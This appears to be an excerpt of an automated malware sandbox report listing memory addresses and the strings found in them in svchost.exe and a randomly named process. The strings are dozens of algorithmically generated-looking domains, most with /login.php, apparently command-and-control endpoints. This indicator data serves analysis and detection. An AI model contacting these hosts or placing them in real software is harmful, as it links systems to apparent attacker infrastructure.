Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633505230.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyv.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufygug.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665001861.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840416294.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656748917.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655106952.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655014945.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654557673.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600938466.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655091377.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656077632.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658856435.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654531739.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytip.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/login.php
Source: svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybig.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1791268726.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794886536.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794287273.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789782421.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590816328.000000000CC16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792465812.00000000033FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybyq.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078144714.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycil.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycyp.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/login.php
Source: svchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708330543.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660555457.000000000CC5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001218000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjav.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633505230.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/http://lykyjux.com/http://lykyjux.com/H
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/http://purycul.com/http://lykyjux.com/http://pupyboq.com/http://qedynaq.com/http:
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
